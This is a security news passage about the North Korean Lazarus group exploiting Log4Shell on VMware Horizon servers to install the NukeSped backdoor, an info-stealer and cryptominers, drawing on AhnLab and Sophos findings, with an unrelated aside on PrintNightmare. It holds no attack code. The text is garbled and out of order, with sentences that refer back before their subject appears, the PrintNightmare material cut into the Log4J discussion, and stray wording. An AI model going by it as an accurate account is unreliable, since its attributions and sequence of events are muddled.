
The report also showed that Log4Shell was also used by Lazarus to distribute the Jin Miner cryptominer instead. The info-stealer has been discovered to have been able to exfiltrate browser-based search histories and account credentials, names of recently used MS Office and Hancom 2010 files, and email account data from MS Office Outlook, Outlook Express, and Windows Live Mail. Researchers found that the C++-based NukeSped backdoor features screenshot capturing, file accessing, and key press recording capabilities, and has been leveraged by Lazarus for deploying a console-based information-stealer malware. Vulnerable VMware Horizon servers have been attacked since last month by Lazarus, which has been abusing Log4Shell via the servers' Apache Tomcat service to facilitate PowerShell command execution and eventual NukeSped backdoor installation, a report from AhnLab's ASEC revealed. Defense in depth and acting upon any detection of miners and other anomalous activity is critical to avoid falling victim to such attacks.North Korean state-sponsored hacking operation Lazarus has been targeting VMware Horizon servers in malware attacks exploiting the Log4Shell remote code execution flaw, tracked as CVE-2021-44228, reports BleepingComputer. And while patching is vital, it won’t be enough if attackers have already been able to install a web shell or backdoor in the network. Like CVE-2021-1675, PrintNightmare may affect more than just domain controllers. “Log4J is installed in hundreds of software products and many organizations may be unaware of the vulnerability lurking within their infrastructure, particularly in commercial, open-source or custom software that doesn’t have regular security support. PrintNightmare can be exploited by a malicious or compromised authenticated user to execute code at the SYSTEM level on a remote domain controller via the vulnerable Windows Print Spooler service running on that box. This includes patched versions of VMware Horizon if organizations use the application in their network,” said Gallagher. “Sophos’ findings suggest that multiple adversaries are implementing these attacks, so the most important protective step is to upgrade all devices and applications that include Log4J with the patched version of the software.


While some of the earlier attacks used Cobalt Strike to stage and execute the cryptominer payloads, the largest wave of attacks that began in mid-January 2022, executed the cryptominer installer script directly from the Apache Tomcat component of the VMware Horizon server.

According to Sophos, the attackers are using several different approaches to infect targets.
